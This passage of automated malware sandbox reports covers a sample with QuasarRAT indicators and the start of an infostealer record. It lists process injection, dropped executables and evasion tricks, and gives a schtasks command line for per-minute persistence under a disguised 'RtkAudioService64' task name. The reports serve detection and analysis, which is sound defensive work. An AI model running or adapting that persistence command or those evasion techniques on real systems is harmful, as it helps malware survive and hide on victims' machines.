\"C:\\Users\\%OSUSER%\\Music\\desktop.ini\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" reads file \"C:\\Users\\%OSUSER%\\Downloads\\desktop.ini\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" wrote 22016 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\vnc.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" wrote 29696 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\windef.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" wrote 16992 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\btpanui\\SystemPropertiesPerformance.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000100100000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"SystemPropertiesPerformance.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%USERPROFILE%\\btpanui\\SystemPropertiesPerformance.exe]- [targetUID: 00000000-00005916]\n \"vnc.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\vnc.exe]- [targetUID: 00000000-00005916]\n \"windef.exe\" has type \"PE32 executable (GUI) Intel 80386 Mono/.Net assembly for MS Windows\"- Location: [%TEMP%\\windef.exe]- [targetUID: 00000000-00005916]\n \"winsock.exe\" has type \"PE32 executable (GUI) Intel 80386 Mono/.Net assembly for MS Windows\"- [targetUID: N/A]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac\" has section name .text with entropy \"6.67611805852\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac\" has section name .rsrc with entropy \"6.62212260461\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac\" has section name .reloc with entropy \"6.77903165045\"\n \"SystemPropertiesPerformance.exe\" has section name .text with entropy \"6.67611805852\"\n \"SystemPropertiesPerformance.exe\" has section name .rsrc with entropy \"6.62212260461\"\n \"SystemPropertiesPerformance.exe\" has section name .reloc with entropy \"6.77903165045\"\n \"vnc.exe\" has section name .text with entropy \"6.400159325\"\n \"vnc.exe\" has section name .data with entropy \"6.46576186449\"\n \"vnc.exe\" has section name .reloc with entropy \"6.01118111823\"\n \"windef.exe\" has section name .text with entropy \"6.43603113308\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "api-1", "type": 6, "relevance": 10, "name": "Creates guarded memory regions (anti-debugging trick to avoid memory dumping)", "description": "\"windef.exe\" is allocating memory with PAGE_GUARD access rights (Handle: 4294967295); (PID: 6132)", "origin": "API Call", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Ransomware/Banking", "identifier": "registry-9", "type": 3, "relevance": 7, "name": "Checks warning level of secure to non-secure traffic redirection", "description": "\"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"WARNONHTTPSTOHTTPREDIRECT\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "network-23", "type": 7, "relevance": 5, "name": "Sends traffic on typical HTTP outbound port, but without HTTP header", "description": "TCP traffic to <IPv4> on port 80 is sent without HTTP header", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "network-22", "type": 7, "relevance": 10, "name": "Uses a browser-related user-agent without launching browser", "description": "Found user-agent(s): Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "registry-27", "type": 3, "relevance": 10, "name": "Modifies proxy settings", "description": "\"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" (Access type: \"DELETEVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"windef.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\windef.exe:Zone.Identifier\" with delete access\n \"windef.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\SubDir\\winsock.exe:Zone.Identifier\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "External Systems", "identifier": "suricata-1", "type": 18, "relevance": 10, "name": "Detected Suricata Alert", "description": "Detected alert \"ET INFO External IP Lookup Domain in DNS Lookup (ip-api .com)\" (SID: 2054141, Rev: 1, Severity: 2) categorized as \"Device Retrieving External IP Address Detected\"\n Detected alert \"ET INFO External IP Lookup ip-api.com\" (SID: 2022082, Rev: 6, Severity: 2) categorized as \"Device Retrieving External IP Address Detected\"", "origin": "Suricata Alerts"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "api-31", "type": 6, "relevance": 9, "name": "Tries to access unusual system drive letters", "description": "\"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" touched \"k:\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" touched \"l:\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" touched \"m:\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" touched \"n:\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" touched \"o:\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" touched \"p:\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" touched \"q:\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" touched \"r:\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" touched \"s:\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" touched \"t:\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" touched \"u:\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" touched \"v:\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" touched \"w:\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" touched \"x:\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" touched \"y:\"", "origin": "API Call", "attck_id": "T1120", "attck_id_wiki": "https://attack.mitre.org/techniques/T1120"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "mutant-1", "type": 4, "relevance": 7, "name": "Creates a mutant that is known to appear in malware", "description": "\"QSR_MUTEX_\" in \"QuasarRAT\"", "origin": "Created Mutant"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "target-14", "type": 9, "relevance": 8, "name": "Spawns a lot of processes", "description": "Spawned process \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" (UID: 00000000-00005916)\n Spawned process \"vnc.exe\" (UID: 00000000-00006112)\n Spawned process \"svchost.exe\" with commandline \"-k\" (UID: 00000000-00005856)\n Spawned process \"windef.exe\" (UID: 00000000-00006132)\n Spawned process \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" (UID: 00000000-00006108)\n Spawned process \"schtasks.exe\" with commandline \"/create /tn RtkAudioService64 /tr \"%USERPROFILE%\\\\btpanui\\\\SystemPropertiesPerformance.exe\" /sc minute /mo 1 /F\" (UID: 00000000-00004040)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\vnc.exe\" (Handle: 724)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\vnc.exe\" (Handle: 724)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\vnc.exe\" (Handle: 724)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\windef.exe\" (Handle: 576)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\windef.exe\" (Handle: 576)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\windef.exe\" (Handle: 576)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" wrote 32 bytes to a remote process \"C:\\3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" (Handle: 288)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" wrote 52 bytes to a remote process \"C:\\3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" (Handle: 288)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" wrote 4 bytes to a remote process \"C:\\3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" (Handle: 288)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" wrote 131072 bytes to a remote process \"C:\\3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" (Handle: 288)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\schtasks.exe\" (Handle: 796)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\schtasks.exe\" (Handle: 796)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\schtasks.exe\" (Handle: 796)\n \"vnc.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 120)\n \"vnc.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 120)\n \"vnc.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 120)\n \"vnc.exe\" wrote 792 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 120)\n \"windef.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\schtasks.exe\" (Handle: 764)\n \"windef.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\schtasks.exe\" (Handle: 764)\n \"windef.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\schtasks.exe\" (Handle: 764)\n \"windef.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\SubDir\\winsock.exe\" (Handle: 1096)\n \"windef.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\SubDir\\winsock.exe\" (Handle: 1096)\n \"windef.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\SubDir\\winsock.exe\" (Handle: 1096)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "api-129", "type": 6, "relevance": 10, "name": "Creates a process in suspended mode (likely for process injection)", "description": "\"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"CreateProcessW\" with parameter \"\"%TEMP%\\vnc.exe\"\" - (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"CreateProcessW\" with parameter \"\"%TEMP%\\windef.exe\"\" - (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"CreateProcessW\" with parameter \"C:\\3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" - (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\schtasks.exe\" /create /tn RtkAudioService64 /tr \"%USERPROFILE%\\btpanui\\SystemPropertiesPerformance.exe\" /s\" - (UID: 00000000-00005916)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "api-42", "type": 6, "relevance": 7, "name": "Tries to hide tracks of having downloaded a file from the internet", "description": "\"windef.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\windef.exe:Zone.Identifier\" with delete access\n \"windef.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\SubDir\\winsock.exe:Zone.Identifier\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "api-83", "type": 6, "relevance": 7, "name": "Writes PE header to memory", "description": "\"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe wrote PE header bytes (\"MZP\") to a remote process \"C:\\3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\"\n which might be an injection preparation attempt ...", "origin": "API Call", "attck_id": "T1055.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/002"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "static-97", "relevance": 10, "name": "PE file contains executable resources", "description": "3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac has PE file in resource with name: \"RT_RCDATA\" and filetype:PE32 executable (GUI) Intel 80386\n for MS Windows\n 3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac has PE file in resource with name: \"RT_RCDATA\" and filetype:PE32 executable (GUI) Intel 80386 Mono/.Net assembly\n for MS Windows\n SystemPropertiesPerformance.exe has PE file in resource with name: \"RT_RCDATA\" and filetype:PE32 executable (GUI) Intel 80386\n for MS Windows\n SystemPropertiesPerformance.exe has PE file in resource with name: \"RT_RCDATA\" and filetype:PE32 executable (GUI) Intel 80386 Mono/.Net assembly\n for MS Windows", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Network Related", "identifier": "network-24", "type": 7, "relevance": 6, "name": "Tries to identify its external IP address", "description": "\"ip-api.com\"", "origin": "Network Traffic", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Exploit/Shellcode", "identifier": "stream-38", "type": 1, "relevance": 8, "name": "Writes shellcode to a remote process", "description": "Wrote 76 instructions to a remote process\n Wrote 6 instructions to a remote process\n Wrote 1816 instructions to a remote process\n Wrote 71 instructions to a remote process", "origin": "Hybrid Analysis Technology", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "suricata-2", "type": 18, "relevance": 10, "name": "Detected Suricata Alert", "description": "Detected alert \"ET MALWARE Common RAT Connectivity Check Observed\" (SID: 2036383, Rev: 8, Severity: 1) categorized as \"A Network Trojan was detected\" (PUA/PUP/Adware)", "origin": "Suricata Alerts"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493
https://hybrid-analysis.com/sample/129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493
Hybrid Analysis - Infostealers
{"size": 3266048, "type": "PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows", "submit_name": "129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493", "sha256": "129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493", "av_detect": 87, "vx_family": "Trojan.Generic", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_network_connections": 1, "total_processes": 1, "total_signatures": 106, "processes": [{"uid": "00000000-00006120", "name": "129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe", "normalized_path": "C:\\129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe", "sha256": "129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493", "av_label": "W32.DN", "av_matched": 15, "av_total": 22}], "mitre_attcks": [{"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 3}, {"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Execution", "technique": "Windows Management Instrumentation", "attck_id": "T1047", "attck_id_wiki": "https://attack.mitre.org/techniques/T1047", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 3, "informative_identifiers_count": 7}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Disable or Modify Tools", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Reflective Code Loading", "attck_id": "T1620", "attck_id_wiki": "https://attack.mitre.org/techniques/T1620", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Credentials from Web Browsers", "attck_id": "T1555.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Credentials from Password Stores", "attck_id": "T1555", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555"}}, {"tactic": "Credential Access", "technique": "Network Sniffing", "attck_id": "T1040", "attck_id_wiki": "https://attack.mitre.org/techniques/T1040", "suspicious_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Credentials from Password Stores", "attck_id": "T1555", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Credential Access", "technique": "Credentials In Files", "attck_id": "T1552.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1552/001", "malicious_identifiers_count": 1, "parent": {"technique": "Unsecured Credentials", "attck_id": "T1552", "attck_id_wiki": "https://attack.mitre.org/techniques/T1552"}}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 3, "informative_identifiers_count": 10}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "suspicious_identifiers_count": 2, "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Network Sniffing", "attck_id": "T1040", "attck_id_wiki": "https://attack.mitre.org/techniques/T1040", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "informative_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": 